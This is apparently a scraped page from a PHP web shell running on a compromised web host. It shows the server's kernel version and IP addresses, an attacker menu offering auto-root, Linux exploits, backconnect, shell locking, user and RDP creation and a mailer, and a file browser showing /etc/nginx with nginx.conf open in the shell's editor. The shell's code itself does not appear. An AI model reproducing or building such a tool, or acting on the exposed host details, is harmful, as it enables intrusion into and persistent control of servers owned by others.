Linux 120.141.167.72.host.secureserver.net 4.18.0-553.150.1.el8_10.x86_64 #1 SMP Fri Jul 31 15:23:31 EDT 2026 x86_64
Apache
: 72.167.141.120 | : 216.73.217.14
808 Domain
7.4.33
bestseocompany
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
nginx /
[ HOME SHELL ]
Name
Size
Permission
Action
conf.d
[ DIR ]
drwxr-xr-x
ea-nginx
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
wordpress_info_cache
[ DIR ]
drwxr-xr-x
.nginx.conf.swp
12
KB
-rw-r--r--
fastcgi_params
1007
B
-rw-r--r--
koi-utf
2.77
KB
-rw-r--r--
koi-win
2.17
KB
-rw-r--r--
mime.types
5.22
KB
-rw-r--r--
nginx.conf
788
B
-rw-r--r--
scgi_params
636
B
-rw-r--r--
uwsgi_params
664
B
-rw-r--r--
win-utf
3.53
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nginx.conf
include /etc/nginx/conf.d/modules/*.conf; user nobody; worker_processes auto; worker_shutdown_timeout 10s; worker_rlimit_nofile 65536; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 16384; multi_accept on; } http { include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; #tcp_nopush on; keepalive_timeout 65; server_tokens off; #gzip on; include /etc/nginx/conf.d/*.conf; }
Close